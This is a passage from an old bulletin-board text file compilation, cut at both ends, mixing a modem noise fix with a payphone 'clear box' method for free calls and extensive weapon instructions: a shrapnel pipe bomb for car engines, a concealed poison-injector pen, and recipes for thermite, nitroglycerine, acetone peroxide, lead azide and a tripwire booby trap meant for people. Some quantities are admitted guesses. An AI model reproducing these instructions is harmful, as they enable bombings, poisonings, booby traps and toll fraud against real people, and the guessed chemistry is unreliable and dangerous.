  3543. First, a personal recomendation. _THIS WORKS!!!_  I have been plagued with
  3544. noise at 2400 for some time. I went round and round with Ma Bell on it, and
  3545. after they sent out several "repair persons" who were, to be kind, of limited
  3546. help in the matter, I threw in the towel. I saw this file on a board up east
  3547. a few days ago, and thought I'd bite. Threw the gismo together in about 10
  3548. minutes, took another five to adjust the pot for best results on my worst
  3549. conection, and guess what? No more worst connecion! A few pointers:
  3550.  
  3551. 1) The pot need not be either 5K or audio taper. I used a 10K 15 turn trim pot.
  3552.    Suggest you use what is handy.
  3553. 2) I used 2MFD's of capacitance (two 1MFD's in parallel) Two R.S. p/n 272-1055
  3554.    work fine. Remember that about 90 Volts will appear across red & green at
  3555.    ring, so the caps should be rated at 100VDC+.
  3556. 3) I ended up with a final series resistance value (100 ohm + pot) of 2.75K.
  3557.    I speculate that one could probably use 2MFD and a fixed 2.7K resistor and
  3558.    do the job 90% of the time. The adjustment of the pot is not very critical.
  3559.    Changes of +/- 1K made little difference in the performance of the circuit.
  3560.  
  3561. Hope it works as well for you as it did for me.
  3562.  
  3563. Mike McCauley
  3564.  
  3565.  
  3566.    ∩ 7   Å3                     è             How to "steal" local calls from most Payphones
  3567.  
  3568.      Now to make free local calls, you need a  finishing nail.  We highly
  3569. recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of an
  3570. inch  in diameter and 2 inches long (of course).  You also need  a  large
  3571. size  paper  clip.  By  large  we  mean they  are  about  2  inches  long
  3572. (FOLDED).  Then  you  unfold the paper clip.  Unfold it  by  taking  each
  3573. piece  and  moving  it out 90 degrees.  When it is done  it  should  look
  3574. somewhat like this:
  3575.                              /----------\
  3576.                              :          :
  3577.                              :          :
  3578.                              :          :
  3579.                              :          :
  3580.                              \-----
  3581.  
  3582.      Now,  on to the neat stuff.  What you do,  instead of unscrewing the
  3583. glued-on  mouthpiece,  is  insert the nail into the center  hole  of  the
  3584. mouthpiece  (where you talk) and push it in with pressure or just  hammer
  3585. it in by hitting the nail on something.  Just DON'T KILL THE  MOUTHPIECE!
  3586. You  could  damage  it if you insert the nail too far or  at  some  weird
  3587. angle.  If  this happens then the other party won't be able to hear  what
  3588. you say.
  3589.      You now have a hole in the mouthpiece in which you can easily insert
  3590. the  paper clip.  So, take out the nail and put in the paper  clip.  Then
  3591. take  the other end of the paper clip and shove it under the rubber  cord
  3592. protector at the bottom of the handset (you know, the blue guy...).  This
  3593. should end up looking remotely like...like this:
  3594.  
  3595.                              /----------\      Mouthpiece
  3596.                              :          :      /
  3597.              Paper clip -->  :          :     /
  3598.                              :      /---:---\
  3599.                              :      :   :   :------------>
  3600.          ====================\---))):       :  To earpiece ->
  3601.                    ^              ^ \-------------------->
  3602.                    :              :
  3603.                    :              :
  3604.                  Cord          Blue guy
  3605.  
  3606. (The  paper clip is shoved under the blue guy to make a  good  connection
  3607. between the inside of the mouthpiece and the metal cord.)
  3608.  
  3609.      Now,  dial  the number of a local number you wish to  call,  sayyyy,
  3610. MCI.  If  everything  goes okay, it should ring and not answer  with  the
  3611. "The Call You Have Made Requires a 20 Cent Deposit" recording.  After the
  3612. other  end  answers  the phone, remove the  paper  clip.  It's  all  that
  3613. simple, see?
  3614.  
  3615.      There  are  a couple problems,  however.  One  is,  as  we mentioned
  3616. earlier, the mouthpiece not working after you punch it.  If this  happens
  3617. to you,  simply move on to the next payphone.  The one you are now on  is
  3618. lost.  Another problem is that the touch tones won't work when the  paper
  3619. clip is in the mouthpiece. There are two ways around this..
  3620.      A> Dial the first 6 numbers.  This should be done without the  paper   ∩ 7   Å3                  èclip making the connection, i.e., one side should not be connected.  Then
  3621. connect  the paper clip,  hold down the last digit,  and slowly pull  the
  3622. paper clip out at the mouthpiece's end.
  3623.      B> Don't  use  the paper clip at all.  Keep the nail  in  after  you
  3624. punch it.  Dial the first 6 digits.  Before dialing the last digit, touch
  3625. the nail head to the plate on the main body of the phone,  the money safe
  3626. thingy..then press the last number.
  3627.  
  3628.      The  reason  that this method is sometimes called  clear  boxing  is
  3629. because  there is another type of phone which lets you actually make  the
  3630. call  and  listen  to  them say "Hello,  hello?"  but  it  cuts  off  the
  3631. mouthpiece  so  they can't hear you.  The Clear Box is used  on  that  to
  3632. amplify your voice signals and send it through the earpiece.  If you  see
  3633. how  this  is even slightly similar to the method we  just  described  up
  3634. there, kindly explain it to US!! Cause WE don't GET IT!
  3635.  
  3636.      Anyways,  this DOES work on almost all single slot,  Dial Tone First
  3637. payphones (Pacific Bell for sure).  We do it all the time.  This  is  the
  3638. least,  WE STRESS *LEAST*, risky form of Phreaking.  And remember.  There
  3639. are other Phreaks like you out there who have read this article and punch
  3640. payphones, so look before you punch, and save time.
  3641.  
  3642.  
  3643.  
  3644.  
  3645.  
  3646.                    - HOW TO MAKE A POWERFUL PIPE BOMB -
  3647.  
  3648.  
  3649.     This pipe bomb is extremely powerful and should be used with extreme
  3650. caution.  This bomb is very nice and EXTREMELY powerful, though.  It packs
  3651. quite a punch, especially nestled on someone's engine block.
  3652.  
  3653. Ingredients:
  3654.  
  3655.         1.  A PVC pipe.  The longer, the more powerful.  I recommend about 5
  3656.             inches.
  3657.  
  3658.         2.  Two ends, preferably brass.  These are the things that screw on to
  3659.             the end of the pipe.
  3660.  
  3661.         3.  Black powder - gun powder.
  3662.  
  3663.         4.  A drill.
  3664.  
  3665.         5.  Cannon Fuse, 6+ inches long.
  3666.  
  3667.       * 6.  Iron bits and pieces.
  3668.  
  3669. * denotes optional.
  3670.  
  3671. Instructions:
  3672.  
  3673.  Use the drill to make a hole in the middle of the PVC pipe, a hole as big as
  3674.  the width of the fuse.  Put one end on one end of the pipe, tighten it nicely  ∩7Å3 è and then pour as much black powder in there as will fit.  Now securely fasten
  3675.  the other end on the other side and insert the fuse.  Place, light, and run!
  3676.  
  3677. Options:
  3678.  
  3679.  Bury the bomb about six inches underground and light.  I once did this and it
  3680.  sent debris 20 feet in every direction.
  3681.  Place on the engine block of car to destroy it.
  3682.  Try electric detonation with an electric match.
  3683.  Put iron bits in the black powder to make it lethal.
  3684.  
  3685. Remember:
  3686.  
  3687.  If this is used correctly it can be as powerful as a hand grenade.  Also,
  3688.  light this in the correct place or else it could make your life miserable.
  3689.  
  3690.  
  3691.                                    Poison Pen
  3692.  
  3693. Need:    plastic retractable ball pt. pen
  3694.          1cc Tuberculin syringe (about .7cm diam. or 1/4in)
  3695.                                 (needle:1cm or 3/8 in.  long)
  3696.          razor blades
  3697.          ruler
  3698.  
  3699.  
  3700. To make:
  3701.          Cut about 1/4 in. or .7cm off end of syringe tube.  Generally make the
  3702. tube streamlined.  Take insides out of pen.  Sheer off tip of pen until you can
  3703. push the syringe in with light pressure and have all the needle, but nothing
  3704. else, protruding from the tip.  Cut a mark in the syringe where pen meets
  3705. syringe.  Remove syringe. Screw the sides of the pen together.  Cut pen in two
  3706. at meeting place of two halves.  Take the moving parts of the pen ( the
  3707. 'clicker') out.  Cut off all protrusions (parts that look like the fins on a
  3708. rocket) Glue all parts together like they were originally.  That part will now
  3709. be called the clicker.  Cut the 'push' flat part off the top of the plunger.
  3710. Cut the plunger so it is about 3/8 in. from the top of the tube when inserted
  3711. all the way.  Whittle the tip of the plunger so it will fit loosely in the
  3712. clicker.  Plunger end first, GENTLY push the tube into the clip-on end of the
  3713. pen as far as it will go, with moderate pressure.  Mark the place where pen
  3714. meets tube.  Remove the tube, measure the distance between the two marks, and
  3715. cut that much off the end of the tube.  Cut and whittle the plunger again.
  3716. Place the clicker in the clip end.  Insert the plunger to about .4cc and gently
  3717. push into the clip end. You should be able to push the clicker and make the
  3718. plunger move all the way down to empty. If not, modify further.  Cut a piece of
  3719. plastic or paper about 2cm or 7/8in wide, big enough to wrap around the biggest
  3720. part of the pen.  Tape it so it forms a sheath or tube and paint to match the
  3721. pen, like a sheath to cover the gap between the ends when the pen is not armed.
  3722.  
  3723.  
  3724. To Arm:
  3725.          Remove the syringe parts and fill with about .4cc liquid (good poison
  3726. of course).  Push the plunger end in the clip end as far as it will go. Some
  3727. liquid should squirt out, which is okay, as long as there is .1-.2cc left.
  3728. Take the other end of the pen and push it over the syringe and into the sheath.  ∩7Å3 èYou should place it so the needle is almost extending out of the end, but not
  3729. quite.
  3730.  
  3731. To use:
  3732.          One-handed, holding with the clip on part (not touching the clicker),
  3733. slide the two ends together. The needle should slide out.  Stab, depress
  3734. clicker. The syringe should inject its poison.
  3735.  
  3736.  
  3737.                                   Chemicals 1
  3738.  
  3739. I. Common "weak" explosives.
  3740.  
  3741.  A. Gunpowder:
  3742.      75% Potassium Nitrate
  3743.      15% Charcoal
  3744.      10% Sulfur
  3745.  
  3746.       The chemicals should be ground into a fine powder (seperately!) with a
  3747. morter & pestle. If gunpowder is ignited in the open, it burns fiercely, but if
  3748. in a closed space it builds up pressure from the released gases and can explode
  3749. the container. Gunpowder works like this: the potassium nitrate oxidizes the
  3750. charcoal and sulfur, which then burn fiercely. Carbon dioxide and sulfur
  3751. dioxide are the gases released.
  3752.  
  3753.  B. Ammonal:
  3754.      Ammonal is a mixture of ammonium nitrate (a strong oxidizer) with aluminum
  3755. powder (the 'fuel' in this case). I am not sure of the % composition for
  3756. Ammonal, so you may want to experiment a little using small amounts.
  3757.  
  3758.  C. Chemically ignited explosives:
  3759.  
  3760.   1. A mixture of 1 part potassium chlorate to 3 parts table sugar (sucrose)
  3761. burns fiercely and brightly (similar to the burning of magnesium) when 1 drop
  3762. of concentrated sulfuric acid is placed on it. What occurs is this: when the
  3763. acid is added it reacts with the potassium chlorate to form chlorine dioxide,
  3764. which explodes on formation, burning the sugar as well.
  3765.   2. Using various chemicals, I have developed a mixture that works very well
  3766. for imitating volcanic eruptions. I have given it the name 'MPG Volcanite'
  3767. (tm). Here it is: potassium chlorate +potassium perchlorate + ammonium nitrate
  3768. + ammonium dichromate + potassium nitrate + sugar + sulfur + iron filings +
  3769. charcoal + zinc dust + some coloring agent. (scarlet= strontium nitrate,
  3770. purple= iodine crystals, yellow= sodium chloride, crimson= calcium chloride,
  3771. etc...).
  3772.   3. So, do you think water puts out fires? In this one, it starts it. Mixture:
  3773. ammonium nitrate + ammonium chloride + iodine + zinc dust. When a drop or two
  3774. of water is added, the ammonium nitrate forms nitric acid which reacts with the
  3775. zinc to produce hydrogen and heat. The heat vaporizes the iodine (giving off
  3776. purple smoke) and the ammonium chloride (becomes purple when mixed with iodine
  3777. vapor). It also may ignite the hydrogen and begin burning.
  3778.      Ammonium nitrate: 8 grams
  3779.      Ammonium choride: 1 gram
  3780.      Zinc dust: 8 grams
  3781.      Iodine crystals: 1 gram
  3782.   4. Potassium permanganate + glycerine when mixed produces a purple-colored  ∩7Å3 èflame in 30 secs-1 min. Works best if the potassium permanganate is finely
  3783. ground.
  3784.   5. Calcium carbide + water releases acetylene gas (highly flammable gas used
  3785. in blow torches...)
  3786.  
  3787. II. Thermite reaction.
  3788.  
  3789.   The Thermite reaction is used in welding, because it generates molten iron
  3790. and temperatures of 3500 C (6000F+). It uses one of the previous reactions that
  3791. I talked about to START it!
  3792.  
  3793.   Starter=potassium chlorate + sugar
  3794.   Main pt.= iron (III) oxide + aluminum powder (325 mesh or finer)
  3795.  
  3796.     Put the potassium chlorare + sugar around and on top of the main pt. To
  3797. start the reaction, place one drop of concentrated sulfuric acid on top of the
  3798. starter mixture. STEP BACK! The ratios are: 3 parts iron(III) oxide to 1 part
  3799. aluminum powder to 1 part potassium chlorate to 1 part sugar.
  3800.  When you first do it, try 3g:1g:1g:1g!
  3801.  Also, there is an alternative starter for the Thermite reaction. The
  3802. alternative is potassium permanganate + glycerine. Amounts: 55g iron(III)
  3803. oxide, 15g aluminum powder, 25g potassium permanganate, 6ml glycerine.
  3804.  
  3805. III. Nitrogen-containing high explosives.
  3806.  
  3807.   A. Mercury(II) Fulminate
  3808.       To produce Mercury(II) Fulminate, a very sensitive shock explosive, one
  3809. might assume that it could be formed by adding Fulminic acid to mercury. This
  3810. is somewhat difficult since Fulminic acid is very unstable and cannot be
  3811. purchased. I did some research and figured out a way to make it without
  3812. fulminic acid. You add 2 parts nitric acid to 2 parts alcohol to 1 part
  3813. mercury. This is theoretical (I have not yet tried it) so please, if you try
  3814. this, do it in very* small amounts and tell me the results.
  3815.  
  3816.   B. Nitrogen Triiodide
  3817.       Nitrogen Triiodide is a very powerful and very shock sensitive explosive.
  3818. Never store it and be carful when you're around it- sound, air movements, and
  3819. other tiny things could set it off.
  3820.  
  3821. Materials-
  3822.    2-3g Iodine
  3823.    15ml conc. ammonia
  3824.    8 sheets filter paper
  3825.    50ml beaker
  3826.    feather mounted on a two meter pole
  3827.    ear plugs
  3828.    tape
  3829.    spatula
  3830.    stirring rod
  3831.  
  3832.   Add 2-3g Iodine to 15ml ammonia in the 50ml beaker. Stir, let stand for 5
  3833. minutes.
  3834. DO THE FOLLOWING WITHIN 5 MINUTES!
  3835.    Retain the solid, decant the liquid (pour off the liquid but keep the brown
  3836. solid...). Scape the brown residue of Nitrogen Triiodide onto a stack of four  ∩7Å3 èsheets of filter paper. Divide solid into four parts, putting each on a
  3837. seperate sheet of dry filter paper. Tape in position, leave to dry undisturbed
  3838. for AT LEAST 30 minutes (preferrably longer). To detonate, touch with feather.
  3839. (WEAR EAR PLUGS WHEN DETONATING OR COVER EARS- IT IS VERY LOUD!)
  3840.  
  3841.   C. Cellulose Nitrate (Guncotton)
  3842.  
  3843.        Commonly known as Smokeless powder, Nitrocellulose is exactly that- it
  3844. does not give off smoke when it burns.
  3845.  
  3846. Materials-
  3847.   70ml concentrated sulfuric acid
  3848.   30ml concentrated nitric acid
  3849.   5g absorbent cotton
  3850.   250ml 1M sodium bicarbonate
  3851.   250ml beaker
  3852.   ice bath
  3853.   tongs
  3854.   paper towels
  3855.  
  3856.    Place 250ml beaker in the ice bath, add 70ml sulfuric acid, 30 ml nitric
  3857. acid. Divide cotton into .7g pieces. With tongs, immerse each piece in the acid
  3858. solution for 1 minute. Next, rinse each piece in 3 successive baths of 500ml
  3859. water. Use fresh water for each piece. Then immerse in 250ml 1M sodium
  3860. bicarbonate. If it bubbles, rinse in water once more until no bubbling occurs.
  3861. Squeeze dry and spread on paper towels to dry overnight.
  3862.  
  3863.  
  3864.   D. Nitroglycerine
  3865.  
  3866.     Nitroglycerine is a *VERY* dangerous shock sensitive explosive. It is used
  3867. in making dynamite, among other things.
  3868.     I am not sure as to the proportions and amounts of chemicals to be used, so
  3869. I shall use estimates.
  3870.  
  3871. Materials-
  3872.   70ml conc. sulfuric acid
  3873.   30ml conc. nitric acid
  3874.   10 ml glycerine
  3875.   ice bath
  3876.   150ml beaker
  3877.  
  3878.    Put the 150ml beaker in the ice bath and make sure that it is very cold.
  3879. Slowly add the 70ml sulfuric and 30ml nitric acids to the beaker, trying to
  3880. maintain a low temperature. When the temperature starts to level off, add about
  3881. 10ml glycerine. If it turns brown or looks funny, **RUN LIKE HELL**. When
  3882. Nitroglycerine turns brown, that means it's ready to explode... If it stays
  3883. clear and all works well, keep the temperature as low as you can and let it sit
  3884. for a few hours. You then should have some Nitroglycerine, probably mixed with
  3885. nitric and sulfuric acids. When you set it off, you must not be nearby.
  3886. Nitroglycerine can fill 10,000 times its original area with expanding gases.
  3887. This means that if you have 10ml's of Nitroglycerine in there, it will produce
  3888. some 100,000ml's of gases.
  3889.    To make it into dynamite, the Nitroglycerine must be absorbed into something
  3890. like wood pulp or diamaeceous earth (spelled something like that).  ∩7Å3 
  3891.  
  3892. IV. Other stuff
  3893.  
  3894.   A. Peroxyacetone
  3895.  
  3896.    Peroxyacetone is extremely flammable and has been reported to be shock
  3897. sensitive.
  3898.  
  3899. Materials-
  3900.   4ml Acetone
  3901.   4ml 30% Hydrogen Peroxide
  3902.   4 drops conc. hydrochloric acid
  3903.   150mm test tube
  3904.  
  3905.  Add 4ml acetone and 4ml hydrogen peroxide to the test tube. Then add 4 drops
  3906. concentrated hydrochloric acid. In 10-20 minutes a white solid should begin to
  3907. appear. If no change is observed, warm the test tube in a water bath at 40
  3908. celsius. Allow the reaction to continue for two hours. Swirl the slurry and
  3909. filter it. Leave out on filter paper to dry for at least two hours. To ignite,
  3910. light a candle tied to a meter stick and light it (while staying at least a
  3911. meter away).
  3912.  
  3913.   B. Smoke smoke smoke...
  3914.  
  3915.    The following reaction should produce a fair amount of smoke. Since this
  3916. reaction is not all that dangerous you can use larger amounts if necessary for
  3917. larger amounts of smoke.
  3918.  
  3919.    6g zinc powder
  3920.    1g sulfur powder
  3921.  
  3922.     Insert a red hot wire into the pile, step back. A lot of smoke should be
  3923. created.
  3924.  
  3925.  
  3926.  
  3927.                                 Pyrotechnics #2
  3928.  
  3929.  
  3930.       Touch Paper, Self Igniting Mixtures, Percussion Explosives
  3931.  
  3932.  
  3933. Sodium Azide - NaN
  3934.                   3
  3935. This white powder is very poisonous. It is also a bit unstable, so treat it
  3936. gently.
  3937.  
  3938. Lead Nitrate - Pb(NO )
  3939.                     3 2
  3940. This contains poisonous lead and is very water soluble so your body will
  3941. absorb it quickly, given the chance. The government has banned leaded paints
  3942. and is phasing out leaded gasoline because the stuff slowly accumulates in
  3943. your body and can screw up all sorts of important innards. If you are careless
  3944. with Lead Nitrate you can do a few lifetimes' worth of damage in one  ∩7Å3èafternoon.
  3945.  
  3946. Ammonium Nitrate - NH NO
  3947.                      4  3
  3948. Commonly used as fertilizer, this stuff is somewhat dangerous in large
  3949. quantities, particularly if it gets very hot. (Entire shiploads of this
  3950. material have been known to go up all at once.) When heated gently, it
  3951. decomposes into water and nitrous oxide (laughing gas). Farmers sometimes use
  3952. it to blow up tree stumps by mixing it with fuel oil and setting the gunk off
  3953. with a detonator. We'll have a very different use for it here.
  3954.  
  3955. Potassium Nitrate - KNO
  3956.                        3
  3957. Also known as saltpeter, this is commercially used as a diuretic for animals.
  3958. It also works as an oxidizing agent in various pyrotechnic mixtures. That is,
  3959. when heated it provides the oxygen needed to make the rest of the mixture
  3960. burn.
  3961.  
  3962. Potassium   Potassium
  3963.  Nitrate     Nitrite   Oxygen
  3964.  
  3965.  2KNO   --->  2KNO    +  O
  3966.      3            2       2
  3967.  
  3968.  
  3969.  
  3970. Potassium Chlorate - KClO
  3971.                          3
  3972. A much more spectacular oxidizing agent than Potassium Nitrate. It not only
  3973. yields more oxygen than Potassium Nitrate, it does so more easily. Pyrotechnic
  3974. mixtures containing this chemical will require much less of it, and yet burn
  3975. more fiercely. Even percussion can readily set the mixtures off. This can be
  3976. useful, but it sometimes makes the mixtures more sensitive than you'd like.
  3977. Mixtures containing this chemical must be handled carefully. Potassium
  3978. Chlorate is also poisonous.
  3979.  
  3980. Potassium     Potassium
  3981.  Chlorate      Chloride   Oxygen
  3982.  
  3983.   2KClO   --->   2KCl   +   3O
  3984.        3                      2
  3985.  
  3986.  
  3987. Aluminum Dust
  3988.  
  3989. Very finely divided aluminum. When put in a glass jar, it almost looks like a
  3990. solid piece of grey metal. In this form it is flammable. Also, it can
  3991. seriously damage your lungs if you inhale it. Be careful not to stir up any
  3992. clouds of dust, and it goes without saying that you shouldn't use it near an
  3993. open flame.
  3994.  
  3995. Zinc Dust
  3996.  
  3997. Very finely divided zinc. Not quite as flammable as Aluminum Dust, but still
  3998. worth handling carefully. Can also damage your lungs if inhaled.  ∩7Å3 ampblack
  3999.  
  4000. This is very finely divided carbon, usually obtained as a soot from other
  4001. manufacturing processes. It is much more effective in pyrotechnic mixtures
  4002. than powdered charcoal. Tiny spots of this are almost unnoticeable, but they
  4003. stick to your hands and smear incredibly far. If you're not very tidy you
  4004. should expect to find black smears all over your face and hands after using
  4005. this.
  4006.  
  4007. Sulfur
  4008.  
  4009. A yellow powder used as a reducing agent in many pyrotechnic mixtures. Buy
  4010. this in the finely powdered form. You can also get it in hard lumps, but these
  4011. will just waste extra time as you have to grind them yourself.
  4012.  
  4013. Potassium Permanganate
  4014.  
  4015. An oxidizing agent that's somewhat less vigorous than others mentioned here.
  4016. Not usually used in pyrotechnic mixtures because it's more expensive and less
  4017. effective than some of the alternatives. There are a few cases when it's just
  4018. the right thing. Don't let this accidentally come in contact with glycerine.
  4019. If such an accident happens, the resulting mess should be immediately wiped up
  4020. with wet paper towels and buried or flushed down a toilet. It should NOT be
  4021. thrown away in a dry waste receptacle!!!
  4022.  
  4023. Gum Arabic
  4024.  
  4025. A white powder which is mixed with water to make a glue like substance. Useful
  4026. for coating various mixtures or binding them together into a solid mass.
  4027.  
  4028. Sodium Peroxide
  4029.  
  4030. A very strange and dangerous oxidizer. Don't let it get wet and don't let it
  4031. touch your skin.
  4032.  
  4033. Glycerine
  4034.  
  4035. A thick liquid, chemically similar to rubbing alcohol. Though harder to get
  4036. burning, it will burn in the right circumstances. Fairly safe stuff.
  4037.  
  4038. Iodine Crystals
  4039.  
  4040. Pure Iodine is a steel grey solid, which is poisonous and which produses
  4041. poisonous vapors when heated. Smells similar to the chlorine used in bleaches
  4042. and swimming pools. If you accidentally should drop some on a hot surface and
  4043. notice the odor, you should leave the area.
  4044.  
  4045.  
  4046.  
  4047.                                 Touch Paper
  4048.  
  4049.   This is an easily made material that acts like a slow burning fuse and is
  4050. ideal for testing small amounts of a pyrotechnic mixture. It is made by
  4051. soaking a piece of absorbent paper, like a paper towel, in a saturated  ∩7Å3èsolution of Potassium Nitrate. (A saturated solution means that you have
  4052. dissolved as much of the chemical in water as is possible.) Hang the paper up
  4053. to dry, and be sure to wipe up any drips. When dry it is ready. Cut off a
  4054. small strip and light the edge to see how different it acts from ordinary
  4055. paper. This will ignite all but the most stubborn mixtures, and will ignite
  4056. gunpowder, which will in turn ignite most anything else.
  4057.  
  4058.   Don't dip the towel in the Potassium Nitrate solution a second time to try to
  4059. make it "stronger". This will actually make it less effective. Some of the
  4060. fancier paper towels don't work too well for this. Best results are obtained
  4061. from the cheap folded paper towels found in public restrooms everywhere.
  4062.  
  4063.  
  4064.                            Self Igniting Mixtures
  4065.  
  4066.   Pulverize 1 gram of Potassium Permanganate crystals and place them on an
  4067. asbestos board or in an earthenware vessel. Let 2-3 drops of glycerine fall
  4068. onto the Potassium Permanganate. The mixture will eventually sizzle and then
  4069. flare. Potassium Permanganate is the oxidizing agent. The glycerine is
  4070. oxidized so quickly that heat is generated faster than it can be dissipated.
  4071. Consequently, the glycerine is ignited. Because this mixture takes so long to
  4072. catch on fire, it is sometimes useful when a time delay is needed to set off
  4073. some other mixture. If you lose patience with this test, DO NOT THROW THE
  4074. MIXTURE AWAY IN A WASTEBASKET!!! Either bury it or flush it down a toilet. I
  4075. know of at least one house fire that was started because this was not done.
  4076. Given time, this stuff WILL start to burn.
  4077.  
  4078.   This demonstration produces a very nice effect, but sends out a lot of
  4079. poisonous fumes, so do it outside. Make a mound of equal volumes of iodine
  4080. crystals and aluminum dust. Make a small indentation at the top of the mound
  4081. and add a drop or two of water and move away. It will hiss and burst into
  4082. flame, generating thick purple smoke. The fumes are Iodine vapor which is
  4083. very caustic, so make sure you are upwind of the fire. Since this is set off
  4084. by moisture, you should not store the mixed material. Mix it immediately
  4085. before you plan to use it.
  4086.  
  4087.   Shred a small piece of newspaper and place on it a small amount of sodium
  4088. peroxide. Add two drops of hot water. The paper will be ignited. CAUTION: Keep
  4089. Sodium Peroxide from moisture and out of contact with organic materials (your
  4090. skin, for example.)
  4091.  
  4092.   Ammonium Nitrate, 5 grams, 1 gram of Ammonium Chloride. Grind these
  4093. SEPARATELY, and add 1/4 gram of zinc dust. Form a cone and add 2-4 drops of
  4094. water. A bright blue flame with large volumes of smoke forms. Depending on the
  4095. quality of your zinc dust, you may need to increase the quantity of zinc.
  4096. Since this is ignited by moisture, you should not attempt to store this
  4097. mixture.
  4098.  
  4099.  
  4100.                            Percussion Explosives
  4101.  
  4102.   This section will not only introduce a couple of mixtures with interesting
  4103. possibilities, but it will also demonstrate how sensitive mixtures containing
  4104. Potassium Chlorate can be. Keep in mind that Chlorate mixtures can be a LOT
  4105. more sensitive than the ones shown here.  ∩7Å3 è
  4106.  
  4107.   Mix 1 part by weight of Sulfur, and 3 parts Potassium Chlorate. Each should
  4108. be ground separately in a mortar. They should be mixed lightly without any
  4109. pressure on a sheet of paper. A small amount of this mixture (less than one
  4110. gram!!) placed on a hard surface and struck with a hammer will explode with a
  4111. loud report.
  4112.  
  4113.   Mix the following parts by weight, the same way as above,
  4114.  
  4115.                 Potassium Chlorate 6
  4116.                 Lampblack          4
  4117.                 Sulfur             1
  4118.  
  4119.   Both of these mixtures are flammable. Mix small quantities only.
  4120.  
  4121.  
  4122.  
  4123.                              Lead Azide  Pb(N )
  4124.                                              3 2
  4125.  
  4126.   Unlike many explosives that must be enclosed in a casing to explode, and
  4127. others that require a detonator to set them off, Lead Azide will explode in
  4128. open air, either due to heat or percussion. Mixed with gum arabic glue, tiny
  4129. dots of it are placed under match heads to make trick exploding matches. The
  4130. same mixture coated onto 1/2 " wood splinters are used to "load" cigars. In
  4131. larger amounts, it is used as a detonator. A moderately light tap will set it
  4132. off, making it much more sensitive than the percussion explosives already
  4133. mentioned. It is very easy to make.
  4134.  
  4135.   Take about 1.3 grams of sodium azide and dissolve it in water. It's best not
  4136. to use any more water than necessary. In a separate container, dissolve about
  4137. 3.3 grams of Lead Nitrate, again only using as much water as needed to get it
  4138. to dissolve. When the two clear liquids are mixed, a white precipitate of Lead
  4139. Azide will settle out of the mixture. Add the Lead Nitrate solution, while
  4140. stirring, until no more Lead  Azide precipitates out. You may not need to use
  4141. it all. Note that the above weights are given only for your convenience if you
  4142. have the necessary scales, and give the approximate proportions needed. You
  4143. need only continue to mix the solutions until no more precipitate forms.
  4144.  
  4145.   The precipitate is filtered out and rinsed several times with distilled
  4146. water.  It is a good idea to store this in its wet form, as it is less
  4147. sensitive this way. It's best not to store it if possible, but if you do, you
  4148. should keep it in a flexible plastic container that wont produce sharp
  4149. fragments in case of an explosion. (NO MORE THAN A GRAM AT A TIME !!!!) Also,
  4150. make sure that the mouth of the container is wiped CLEAN before putting the lid
  4151. on. Just the shock of removing the lid is enough to set off the dry powder if
  4152. it is wedged between the container and the stopper. Don't forget that after
  4153. you've removed the precipitate from the filter paper, there will still be
  4154. enough left to make the filter paper explosive.
  4155.  
  4156.   Lead Azide is very powerful as well as very sensitive. Never make more than a
  4157. couple of grams at one time.
  4158.  
  4159.             Reaction Equations  ∩7Å3 è
  4160. Lead        Sodium        Lead     Sodium
  4161. Nitrate      Azide       Azide    Nitrate
  4162.  
  4163. Pb(NO )   +  2NaN   ---> Pb(N )  + 2NaNO
  4164.      3 2         3           3 2        3
  4165.  
  4166.   Don't try to salvage the Sodium Nitrate that's left over (dissolved in the
  4167. water). Sodium nitrate is cheap, not really useful for good pyrotechnics, and
  4168. this batch will be contaminated with poisonous lead. It's worthless stuff.
  4169. Dump it out.
  4170.  
  4171.   To demonstrate the power of a little bit of Lead Azide, cut out a piece of
  4172. touch paper in the following shape
  4173.  
  4174.  
  4175.  
  4176. -----------------------------
  4177. !                            !
  4178. !                            !
  4179. !                             ---------------
  4180. !                                            !
  4181. !                             ---------------
  4182. !                            !
  4183. !                            !
  4184. -----------------------------
  4185.  
  4186.   Where the size of the wide rectangle is no more than one inch x 1/2 inch, and
  4187. the length of the little fuse is at least 3/4 inch. Apply a thin layer of wet
  4188. Lead Azide to the large rectangle with a paint brush and let it dry
  4189. thoroughly. When done, set this tester out in the open, light the fuse at the
  4190. very tip and step back. If done properly, the tiny bit of white powder will
  4191. produce a fairly loud explosion.
  4192.  
  4193.  
  4194.                           A Lead Azide Booby Trap
  4195.  
  4196.   Get some string that's heavy enough so that it won't break when jerked hard.
  4197. A couple of feet is enough to test this out. You may want to use a longer piece
  4198. depending on what you plan to do with this. Fold a small "Z" shape in the
  4199. center of the string, as shown in figure 1. The middle section of the "Z"
  4200. should be about one inch long.
  4201.  
  4202.  
  4203. -------------------------------------.
  4204.                              .
  4205.                    .
  4206.            .
  4207.        --------------------------------------------------
  4208.  
  4209.                   Figure 1. Fold string into a small Z
  4210.  
  4211.   Next, twist the Z portion together as tightly as you can. Don't worry if it
  4212. unwinds a bit when you let go, but it should still stay twisted closely
  4213. together. If it doesn't, you will need a different kind of string. Figure 2  ∩7Å3 ètries to show what this will look like.
  4214.  
  4215. -------------//////////////////-----------------
  4216.  
  4217.                   Figure 2. Twist the Z portion tightly
  4218.  
  4219.   Next, apply some wet Lead Azide to the twisted portion with a paint brush.
  4220. The Lead Azide should have a bit of Gum Arabic in it to make it sticky. Cut
  4221. out a piece of paper, two inches by 6 inches long, wrap it around the twisted
  4222. portion, and glue the end on so that it stays put. You should now have a two
  4223. inch narrow paper tube with a string sticking out each end, as shown in figure
  4224. 3.
  4225.  
  4226.           -------------------------
  4227.           !                       !
  4228. ----------!                       !-------------------
  4229.           !                       !
  4230.           -------------------------
  4231.  
  4232.                   Figure 3. The completed Booby Trap
  4233.  
  4234.   You should now set the booby trap aside for at least two weeks so that the
  4235. Lead Azide inside can dry completely. Don't try to speed up the process by
  4236. heating it. When the two ends of the string are jerked hard, the friction in
  4237. the wound up string will set off the Lead Azide. The booby trap can be
  4238. attatched to doors, strung out as tripwires, or set up in any other situation
  4239. that will cause a quick pull on the strings. Be careful not to use too much
  4240. Lead Azide. A little will go a long way. Before trying this on an unsuspecting
  4241. soul, make a test booby trap as explained here, tie one end to a long rope,
  4242. and set it off from a distance.
  4243.  
  4244.   The paper wound around the booby trap serves two purposes. It keeps the Lead
  4245. Azide from flaking off, and it pads the stuff so it will be less likely to get
  4246. set off accidentally. A good vigorous swat will still set it off though, so
  4247. store these separately and keep them padded well.
  4248.  
  4249.  
  4250.                           Getting The Chemicals
  4251.  
  4252.   As always, be sure to use your brains when ordering chemicals from a lab
  4253. supply house. Those people KNOW what Sodium Azide and Lead Nitrate make when
